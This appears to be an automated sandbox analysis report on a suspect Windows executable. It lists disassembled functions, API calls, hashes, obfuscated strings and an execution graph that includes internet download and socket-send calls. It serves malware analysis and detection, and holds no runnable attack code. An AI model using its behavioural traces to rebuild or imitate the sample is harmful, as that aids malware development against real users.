                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFileLast
                                                                                                • String ID:
                                                                                                • API String ID: 1547350101-0
                                                                                                • Opcode ID: 624cbb72d69ff08087c93961b7cb2a923c1150c0768e4771583c009ad8420c7d
                                                                                                • Instruction ID: 7867067bb0d2a13ad74349d17a490d27aad403386dc6117c46114e9cae82ce35
                                                                                                • Opcode Fuzzy Hash: 624cbb72d69ff08087c93961b7cb2a923c1150c0768e4771583c009ad8420c7d
                                                                                                • Instruction Fuzzy Hash: DB41F632900645ABDB21ABA9CC42F9E7775EF58370F240516F628E73A1EA31DD41B721
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CC4F1F: _free.LIBCMT ref: 00CC4F2D
                                                                                                  • Part of subcall function 00CCC8A4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00CD24A0,?,00000000,00000000), ref: 00CCC946
                                                                                                • GetLastError.KERNEL32 ref: 00CCB935
                                                                                                • __dosmaperr.LIBCMT ref: 00CCB93C
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00CCB97B
                                                                                                • __dosmaperr.LIBCMT ref: 00CCB982
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                • String ID:
                                                                                                • API String ID: 167067550-0
                                                                                                • Opcode ID: f173b5e58cc131f6ec306fe5523fbc03503eafbde78191dbebae08dd6ce1f649
                                                                                                • Instruction ID: 37deb0d49f98746df2da3ad3a675ffd31fb363036b326d085692d6b80533dc44
                                                                                                • Opcode Fuzzy Hash: f173b5e58cc131f6ec306fe5523fbc03503eafbde78191dbebae08dd6ce1f649
                                                                                                • Instruction Fuzzy Hash: 5D21B371A00615AF9B206FE6CC82F6BB7ACEF44364F14852CFA6D97191D734ED4097A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000078,00CC0FB3,0000007C,00CC4E9D,00CC0FB3,?,00000000,?,00CC5036,777D6490,00000078,777D6490,?,?,?,00CB2B9A), ref: 00CC9247
                                                                                                • _free.LIBCMT ref: 00CC92A4
                                                                                                • _free.LIBCMT ref: 00CC92DA
                                                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CC5036,777D6490,00000078,777D6490,?,?,?,00CB2B9A,?), ref: 00CC92E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_free
                                                                                                • String ID:
                                                                                                • API String ID: 2283115069-0
                                                                                                • Opcode ID: 7367e503f15cd5f4f6e38803555051a89cf11219f19a9229e3f1f92e76cf2f37
                                                                                                • Instruction ID: 4dc4d1f31a5ef86c69f504da09f09ae0e0bf13bf42f09289aba4e93cada2ac00
                                                                                                • Opcode Fuzzy Hash: 7367e503f15cd5f4f6e38803555051a89cf11219f19a9229e3f1f92e76cf2f37
                                                                                                • Instruction Fuzzy Hash: A511C632205141BA9B107AB5DCCFF7F3159DBC2775B25022DF539971D2EE318D056210
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00CC0FAC,00CC0FAC,E800CE41,00CC5905,00CC8E7D,?,?,00CC2609,00CC0FAC,?,00CC13D8,E800CE42,777D6490), ref: 00CC939E
                                                                                                • _free.LIBCMT ref: 00CC93FB
                                                                                                • _free.LIBCMT ref: 00CC9431
                                                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00CC2609,00CC0FAC,?,00CC13D8,E800CE42,777D6490), ref: 00CC943C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_free
                                                                                                • String ID:
                                                                                                • API String ID: 2283115069-0
                                                                                                • Opcode ID: a9cc310f8ba931e555e8c3b1ac75741a6a5baafc6dbe38db97728e90e920b47c
                                                                                                • Instruction ID: 19b910c46aa5345445a8dd60fe0273e068394b7b32330024d0a1b7aacaed66e9
                                                                                                • Opcode Fuzzy Hash: a9cc310f8ba931e555e8c3b1ac75741a6a5baafc6dbe38db97728e90e920b47c
                                                                                                • Instruction Fuzzy Hash: D511E532605582AA96107A75ECCFF7F2559DBC1774B29022CF538971E1EF318D066220
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00CC9CE0,00000000,?,00CCF6A6,00000000,00000000,00CC9CE0,?,?,00000000,00000000,00000001), ref: 00CC9BFA
                                                                                                • GetLastError.KERNEL32(?,00CCF6A6,00000000,00000000,00CC9CE0,?,?,00000000,00000000,00000001,00000000,00000000,?,00CC9CE0,00000000,00000104), ref: 00CC9C04
                                                                                                • __dosmaperr.LIBCMT ref: 00CC9C0B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2398240785-0
                                                                                                • Opcode ID: 4588b631e6e88e7301b6abe47dd295d059a15f4605061547dd0f704ce884ff1c
                                                                                                • Instruction ID: d621ce72b4515d75933b1d2ae03cc5073bae6c05d8568f745a9a6e554fbdcdf2
                                                                                                • Opcode Fuzzy Hash: 4588b631e6e88e7301b6abe47dd295d059a15f4605061547dd0f704ce884ff1c
                                                                                                • Instruction Fuzzy Hash: BEF06932200616BB8B206BA2CC08F6ABFA9FF443A03008529F429D6520D731E861DBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00CC9CE0,00000000,?,00CCF71B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00CC9B91
                                                                                                • GetLastError.KERNEL32(?,00CCF71B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00CC9CE0,00000000,00000104,?), ref: 00CC9B9B
                                                                                                • __dosmaperr.LIBCMT ref: 00CC9BA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2398240785-0
                                                                                                • Opcode ID: 63def3506bfed7f5344958751af060e507dd069cedc021487a4d15cecbffd7dc
                                                                                                • Instruction ID: 3df819d765015c38f492acc22c08c878e7a2678d7f7066068de2ab842ce8e320
                                                                                                • Opcode Fuzzy Hash: 63def3506bfed7f5344958751af060e507dd069cedc021487a4d15cecbffd7dc
                                                                                                • Instruction Fuzzy Hash: B2F03C32600515BB8B206FA2EC0CF5ABFA9FF483A03048559F52ED6520D731ED61DBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(00CB48D0,777D6490,00CE17E8,00000000,00CB48D0,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0), ref: 00CD3DC6
                                                                                                • GetLastError.KERNEL32(?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000,00CB48D0,?,00CCF432,00CB48D0), ref: 00CD3DD2
                                                                                                  • Part of subcall function 00CD3D98: CloseHandle.KERNEL32(FFFFFFFE,00CD3DE2,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000,00CB48D0), ref: 00CD3DA8
                                                                                                • ___initconout.LIBCMT ref: 00CD3DE2
                                                                                                  • Part of subcall function 00CD3D5A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CD3D89,00CD33F4,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000), ref: 00CD3D6D
                                                                                                • WriteConsoleW.KERNEL32(00CB48D0,777D6490,00CE17E8,00000000,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000), ref: 00CD3DF7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                • Opcode ID: defc4f51f8777ae306f9f83015c490b59974d615af36779577a16d62f85d3490
                                                                                                • Instruction ID: 0a725f557f8091cb3250c736169271bf7ca53c248fcb988dcf5195326c9fedbc
                                                                                                • Opcode Fuzzy Hash: defc4f51f8777ae306f9f83015c490b59974d615af36779577a16d62f85d3490
                                                                                                • Instruction Fuzzy Hash: 2CF01C360111D8BBCF222F95DC09B8D3F67FB083A1B044011FA1986230C732AA64AFA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SleepConditionVariableCS.KERNELBASE(?,00CC253E,00000064), ref: 00CC25C4
                                                                                                • LeaveCriticalSection.KERNEL32(00CE4738,?,?,00CC253E,00000064), ref: 00CC25CE
                                                                                                • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00CC253E,00000064), ref: 00CC25DF
                                                                                                • EnterCriticalSection.KERNEL32(00CE4738,?,00CC253E,00000064), ref: 00CC25E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                • String ID:
                                                                                                • API String ID: 3269011525-0
                                                                                                • Opcode ID: 6294d96feba7b35b72868e64858a432bd806f3687828e5569670341ec3abe93f
                                                                                                • Instruction ID: a689cb32da5c60e0e51795b655722013b19bfa72eae7b1b1cf2bae8ef0ca4dee
                                                                                                • Opcode Fuzzy Hash: 6294d96feba7b35b72868e64858a432bd806f3687828e5569670341ec3abe93f
                                                                                                • Instruction Fuzzy Hash: 35E04835943164F7CB051B53EC09F9E3F69EF1A752F014026F5055A160C7755940DBD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00CC7BCA
                                                                                                  • Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
                                                                                                  • Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979
                                                                                                • _free.LIBCMT ref: 00CC7BDD
                                                                                                • _free.LIBCMT ref: 00CC7BEE
                                                                                                • _free.LIBCMT ref: 00CC7BFF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 84f6a29b9f3b5d75e04400290c81b486be7e2cdd44fffa74bab1002d6f2006fb
                                                                                                • Instruction ID: 61364ed3c3bb48ae063cd6cde11121979403e16f87bc24a1d2931dc027e6499e
                                                                                                • Opcode Fuzzy Hash: 84f6a29b9f3b5d75e04400290c81b486be7e2cdd44fffa74bab1002d6f2006fb
                                                                                                • Instruction Fuzzy Hash: 58E04679809AA0AB8B022F64FCC1B1E3BB1A708714322090EF6000B231CF314052BF86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,7782F990,?,00000000), ref: 00CB577D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileModuleName
                                                                                                • String ID: ANLx9WEo4vQy$Mq==
                                                                                                • API String ID: 514040917-2396399242
                                                                                                • Opcode ID: 19ba9e12ac29874d62856924f044c0ab10be68b0f586f10ac180f81fe25476e5
                                                                                                • Instruction ID: a926918056c992fa67137817cf3e9c3d838376ebd22a5601860a69f401def171
                                                                                                • Opcode Fuzzy Hash: 19ba9e12ac29874d62856924f044c0ab10be68b0f586f10ac180f81fe25476e5
                                                                                                • Instruction Fuzzy Hash: 2B710871E002099FDF08DF68D885BEEBB76EF85310F64416CE405A72D6DB359E868B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                                • API String ID: 0-3763621502
                                                                                                • Opcode ID: 13ee9afd6b3d1ae640625b0be2cbc62f51d6d9a31def8ef3db07a131a389a726
                                                                                                • Instruction ID: 63c44a76c870b285ff82ba14cb971baec7bbe68a27f7d049fd8d856abaeebca5
                                                                                                • Opcode Fuzzy Hash: 13ee9afd6b3d1ae640625b0be2cbc62f51d6d9a31def8ef3db07a131a389a726
                                                                                                • Instruction Fuzzy Hash: 17416271A08254EBCB25DF9ADC81FAEBBF8EB85310B24026EF81497251D7709A41EB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CBF1C1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileModuleName
                                                                                                • String ID: 853321935212$Otu=
                                                                                                • API String ID: 514040917-3849146471
                                                                                                • Opcode ID: 207e304b5faf79f934b8e4c72b7cab8633736dbd3047e35ff3be0c86570b17c3
                                                                                                • Instruction ID: 7a87ccb779b7e940405636470b76d0ee8dac5b52332256a91049c671f6339d45
                                                                                                • Opcode Fuzzy Hash: 207e304b5faf79f934b8e4c72b7cab8633736dbd3047e35ff3be0c86570b17c3
                                                                                                • Instruction Fuzzy Hash: AE11E674A0028467CF54BF35C817BED3A689B02794F48059DFC4243653DF769B4996D3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:2.9%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:2.6%
                                                                                                Total number of Nodes:1369
                                                                                                Total number of Limit Nodes:47
                                                                                                execution_graph 65094 4347c3 65099 434a95 SetUnhandledExceptionFilter 65094->65099 65096 4347c8 pre_c_initialization 65100 44548b 20 API calls 2 library calls 65096->65100 65098 4347d3 65099->65096 65100->65098 65101 415c54 65116 41b2ce 65101->65116 65103 415c5d 65127 4020f6 65103->65127 65108 416fd7 65151 401e8d 65108->65151 65112 401fd8 11 API calls 65113 416fec 65112->65113 65114 401fd8 11 API calls 65113->65114 65115 416ff8 65114->65115 65157 4020df 65116->65157 65121 41b313 InternetReadFile 65124 41b336 65121->65124 65123 41b363 InternetCloseHandle InternetCloseHandle 65125 41b375 65123->65125 65124->65121 65124->65123 65126 401fd8 11 API calls 65124->65126 65168 4020b7 65124->65168 65125->65103 65126->65124 65128 40210c 65127->65128 65129 4023ce 11 API calls 65128->65129 65130 402126 65129->65130 65131 402569 28 API calls 65130->65131 65132 402134 65131->65132 65133 404aa1 65132->65133 65134 404ab4 65133->65134 65218 40520c 65134->65218 65136 404ac9 ctype 65137 404b40 WaitForSingleObject 65136->65137 65138 404b20 65136->65138 65140 404b56 65137->65140 65139 404b32 send 65138->65139 65141 404b7b 65139->65141 65224 420f88 54 API calls 65140->65224 65144 401fd8 11 API calls 65141->65144 65143 404b69 SetEvent 65143->65141 65145 404b83 65144->65145 65146 401fd8 11 API calls 65145->65146 65147 404b8b 65146->65147 65147->65108 65148 401fd8 65147->65148 65149 4023ce 11 API calls 65148->65149 65150 401fe1 65149->65150 65150->65108 65152 402163 65151->65152 65153 40219f 65152->65153 65243 402730 11 API calls 65152->65243 65153->65112 65155 402184 65244 402712 11 API calls std::_Deallocate 65155->65244 65158 4020e7 65157->65158 65174 4023ce 65158->65174 65160 4020f2 65161 43bc91 65160->65161 65163 446077 ___crtLCMapStringA 65161->65163 65162 4460b5 65190 44051d 20 API calls __dosmaperr 65162->65190 65163->65162 65165 4460a0 RtlAllocateHeap 65163->65165 65189 442ec0 7 API calls 2 library calls 65163->65189 65165->65163 65166 41b2ec InternetOpenW InternetOpenUrlW 65165->65166 65166->65121 65169 4020bf 65168->65169 65170 4023ce 11 API calls 65169->65170 65171 4020ca 65170->65171 65191 40250a 65171->65191 65173 4020d9 65173->65124 65175 402428 65174->65175 65176 4023d8 65174->65176 65175->65160 65176->65175 65178 4027a7 65176->65178 65179 402e21 65178->65179 65182 4016b4 65179->65182 65181 402e30 65181->65175 65183 4016c6 65182->65183 65184 4016cb 65182->65184 65188 43bc59 11 API calls _abort 65183->65188 65184->65183 65185 4016f3 65184->65185 65185->65181 65187 43bc58 65188->65187 65189->65163 65190->65166 65192 40251a 65191->65192 65193 402520 65192->65193 65194 402535 65192->65194 65198 402569 65193->65198 65208 4028e8 28 API calls 65194->65208 65197 402533 65197->65173 65209 402888 65198->65209 65200 40257d 65201 402592 65200->65201 65202 4025a7 65200->65202 65214 402a34 22 API calls 65201->65214 65216 4028e8 28 API calls 65202->65216 65205 40259b 65215 4029da 22 API calls 65205->65215 65206 4025a5 65206->65197 65208->65197 65210 402890 65209->65210 65211 402898 65210->65211 65217 402ca3 22 API calls 65210->65217 65211->65200 65214->65205 65215->65206 65216->65206 65219 405214 65218->65219 65220 4023ce 11 API calls 65219->65220 65221 40521f 65220->65221 65225 405234 65221->65225 65223 40522e 65223->65136 65224->65143 65226 405240 65225->65226 65227 40526e 65225->65227 65241 4028e8 28 API calls 65226->65241 65242 4028a4 22 API calls std::_Xinvalid_argument 65227->65242 65230 40524a 65230->65223 65241->65230 65243->65155 65244->65153 65245 4347d5 65246 4347e1 CallCatchBlock 65245->65246 65272 4344e4 65246->65272 65248 4347e8 65250 434811 65248->65250 65577 434947 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 65248->65577 65257 434850 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65250->65257 65283 444191 65250->65283 65254 434830 CallCatchBlock 65255 4348b0 65291 434a62 65255->65291 65257->65255 65578 443346 36 API calls 6 library calls 65257->65578 65265 4348d2 65266 4348dc 65265->65266 65580 44337e 28 API calls _abort 65265->65580 65268 4348e5 65266->65268 65581 443321 28 API calls _abort 65266->65581 65582 43465b 13 API calls 2 library calls 65268->65582 65271 4348ed 65271->65254 65273 4344ed 65272->65273 65583 434bbd IsProcessorFeaturePresent 65273->65583 65275 4344f9 65584 438e71 10 API calls 4 library calls 65275->65584 65277 4344fe 65278 434502 65277->65278 65585 44401e 65277->65585 65278->65248 65281 434519 65281->65248 65284 4441a8 65283->65284 65285 434f2b CatchGuardHandler 5 API calls 65284->65285 65286 43482a 65285->65286 65286->65254 65287 444135 65286->65287 65288 444164 65287->65288 65289 434f2b CatchGuardHandler 5 API calls 65288->65289 65290 44418d 65289->65290 65290->65257 65601 436dd0 65291->65601 65293 434a75 GetStartupInfoW 65294 4348b6 65293->65294 65295 4440e2 65294->65295 65603 44ef19 65295->65603 65297 4348bf 65300 40e913 65297->65300 65298 4440eb 65298->65297 65607 4466d5 36 API calls 65298->65607 65709 41ca9e LoadLibraryA GetProcAddress 65300->65709 65302 40e92f GetModuleFileNameW 65714 40f311 65302->65714 65304 40e94b 65305 4020f6 28 API calls 65304->65305 65306 40e95a 65305->65306 65307 4020f6 28 API calls 65306->65307 65308 40e969 65307->65308 65729 41bd69 65308->65729 65312 40e97b 65313 401e8d 11 API calls 65312->65313 65314 40e984 65313->65314 65315 40e9e1 65314->65315 65316 40e997 65314->65316 65755 401e65 65315->65755 66014 40fb01 118 API calls 65316->66014 65319 40e9f1 65323 401e65 22 API calls 65319->65323 65320 40e9a9 65321 401e65 22 API calls 65320->65321 65322 40e9b5 65321->65322 66015 410e85 36 API calls __EH_prolog 65322->66015 65324 40ea10 65323->65324 65760 40531e 65324->65760 65327 40ea1f 65765 406383 65327->65765 65328 40e9c7 66016 40fab2 